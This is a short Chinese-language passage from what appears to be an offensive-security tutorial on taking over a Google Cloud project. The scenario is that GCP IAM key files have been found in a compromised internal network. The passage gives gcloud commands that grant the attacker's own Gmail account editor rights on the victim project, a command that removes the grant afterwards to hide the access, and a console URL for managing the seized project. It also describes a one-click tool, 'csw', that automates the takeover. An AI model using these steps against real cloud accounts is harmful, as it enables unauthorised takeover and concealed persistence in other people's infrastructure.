gcloud 命令实现项目接管
如果我们在目标内网翻文件的过程中发现了可操控 GCP IAM 的 json 鉴权文件,通常情况攻击者可通过 gcloud 命令向指定的项目中添加攻击者自己的 gmail 邮箱,这样攻击者就可以在 web console 中管理被攻击的 google 云权限了。相关gloud 命令如下:
# 指定的 gcp 上 project example-project-id-1 中添加用户 test-user@gmail.com 的 editor权限
gcloud projects add-iam-policy-binding example-project-id-1 --member='user:test-user@gmail.com' --role='roles/editor'
#指定的 gcp 上 project example-project-id-1 中移除用户 test-user@gmail.com 的 editor权限
gcloud projects remove-iam-policy-binding example-project-id-1 --member='user:test-user@gmail.com' --role='roles/editor'
#权限添加成功后,登录 google test-user@gmail.com 账号,访问如下链接即可接管项目
https://console.cloud.google.com/home/dashboard?project=example-project-id-1csw 命令一键实现
1、列出该命令模块的帮助信息
2、csw 命令实现一键给项目添加“攻击者”自己的邮箱,访问工具给出的链接后实现自动化接管 google 云权限。
3、当“攻击者”实现了自己的任务后,可利用 csw 移除权限。
